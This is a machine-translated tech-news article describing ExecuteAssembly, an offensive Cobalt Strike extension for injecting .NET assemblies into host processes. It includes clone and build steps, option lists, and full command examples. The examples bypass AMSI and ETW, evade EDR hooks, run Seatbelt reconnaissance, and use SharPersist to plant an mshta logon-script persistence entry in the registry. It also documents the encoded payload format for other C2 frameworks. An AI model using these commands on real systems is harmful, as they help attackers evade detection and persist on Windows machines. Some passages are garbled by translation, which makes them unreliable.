Shulou(Shulou.com)06/03 Report--

This article mainly explains "how to use ExecuteAssembly to achieve .NET program loading and injection". The content of the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn how to use ExecuteAssembly to achieve .NET program loading and injection.

About ExecuteAssembly

ExecuteAssembly is an alternative to CS executable components. ExecuteAssembly is built based on C _ Candrel +, which can help researchers to load and inject .NET assemblies. ExecuteAssembly reuses the host process spawnto to load the CLR module / AppDomainManager,Stomping loader / .NET assembly PE DOS header and unloads the .NET related modules for ETW+AMSI bypass. In addition, it can bypass EDR hooks based on NT static system calls and implement hidden imports by dynamically parsing API (superfasthash hash algorithm).

Function introduction

Unloaded CLR related modules from the PEB data structure

Streaming .NET assemblies and reflective DLL headers

Bypass EDR hooks using static hard-coded system calls

CLR "AppDomain/AppDomainManager" enumeration and reuse

WIn32 API dynamic parsing, based on API response hash implementation

Implement AMSI and ETW fixes after loading .NET assemblies

.net assembly byte parsing, scanning for CLR versions to be loaded and used

GetProcAddress/LoadLibrary/GetModuleHandle is not used for ETW bypass

V4 COM API & reflective DLL injection is used to implement CLR hosting.

Tool download

Researchers can use the following commands to clone the source code of the project locally:

Using the git clone https://github.com/med0x2e/ExecuteAssembly.git tool

X64 (syscalls): this version mainly relies on using static system calls to bypass EDR hooks, and you can use this version to build x64 versions of DLL (currently only x64 is supported).

X86 | x64 (PEB): dynamically retrieve the required API address at run time by traversing the EAP table of the PEB module and parsing the API through the superfasthash hash. However, this does not take into account the setting location of the EDR hook in kernel32.dll or ntdll.dll, we can use this version to generate both x86 and x64 DLL, or just x86 DLL, and use the x64 (syscalls) version to generate x64 DLL to deal with common EDR hooks.

Build the required DLL using VS2017 or Windows SDK 10.0.17134.0 (or compatible SDK version).

Make sure that gzip is installed and that the following components are stored in the same directory, and load the script "ExecuteAssembly.cna":

ExecuteAssembly.cnaExecuteAssembly-x64.dllExecuteAssembly-x86.dll command line interface option-- dotnetassembly: .net Assembly to load/inject.--assemblyargs: .net assembly arguments.--unlink-modules: Unlink .NET related modules such as CLR/MsCoree related DLLs from PEB data structures.--stomp-headers: Stomp .NET assembly and reflective DLL PE DOS headers.--etw: Bypass event tracing on windows (ETW).-- amsi: Bypass AMSI.--spawnto: Choose spawnto process List of .NET binaries loading the CLR by default when executed:-PresentationHost.exe-stordiag.exe-ScriptRunner.exe-caitstatic.exe-Microsoft.Uev.SyncController.exe-TsWpfWrp.exe-UevAgentPolicyGenerator.exe-UevAppMonitor.exe-FileHistory.exe-UevTemplateBaselineGenerator.exe-UevTemplateConfigItemGenerator.exe

Load CLR by default and set it to spawnto (avoid using a known LOLBins).

The tool uses sample ExecuteAssembly-- dotnetassembly / tmp/Seatbelt.exe-- assemblyargs LogonSessions-- unlink-modules-- stomp-headers-- amsi-- etw-- spawnto PresentationHost.exeExecuteAssembly-- amsi-- etw-- unlink-modules-- stomp-headers-- dotnetassembly / tmp/ghostpack/SharPersist.exe-- assemblyargs-t reg-c "C:\ Windows\ SysWow64\ mshta.exe C:\ Users\ admin\ Downloads\ Test2.hta"-k logonscript-m add-spawnto FileHistory.exeExecuteAssembly-unlink-modules- -stomp-headers-- dotnetassembly / tmp/ghostpack/SharPersist.exe-- assemblyargs-t reg-k "logonscript"-v "C:\ Windows\ SysWow64\ mshta.exe C:\ Users\ admin\ Downloads\ Test.hta"-m remove-- spawnto FileHistory.exeExecuteAssembly-- unlink-modules-amsi-- dotnetassembly / tmp/ghostpack/SharpWMI.exe-- assemblyargs action=query computername=localhost query= "select * from win32_service"-spawnto FileHistory.exeExecuteAssembly-amsi-etw-dotnetassembly / tmp/ghostpack/SharpWMI.exe -- assemblyargs action=query query= "select * from win32_process"-spawnto PresentationHost.exeC2 support

This feature is mainly used to support and test Cobalt Strike, but it can also be used with other C2 frameworks (such as MSF, etc.). But don't forget that the reflection DLL DLLMAIN needs to take a single line of Payload as a parameter, in the following format:

AMSI_FLAG | ETW_FLAG | STOMPHEADERS_FLAG | UNLINKMODULES_FLAG | LL_FLAG.LENGTH_FLAG.B64_ENCODED_COMPRESSED_PAYLOAD [SPACE SEPARATED ARGUMENTS]

AMSI_FLAG: 0 or 1

ETW_FLAG: 0 or 1

STOMPHEADERS_FLAG: 0 or 1

UNLINKMODULES_FLAG: 0 or 1

LENGTH_FLAG: .net assembly byte size

LL_FLAG: the length of the LENGTH_FLAG

B64_ENCODED_COMPRESSED_PAYLOAD: Gzip compressed and Base64 encoded .NET assemblies

[SPACE SEPARATED ARGUMENTS]: .net assembly parameters

Thank you for your reading, the above is the content of "how to use ExecuteAssembly to achieve .NET program loading and injection". After the study of this article, I believe you have a deeper understanding of how to use ExecuteAssembly to achieve .NET program loading and injection, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.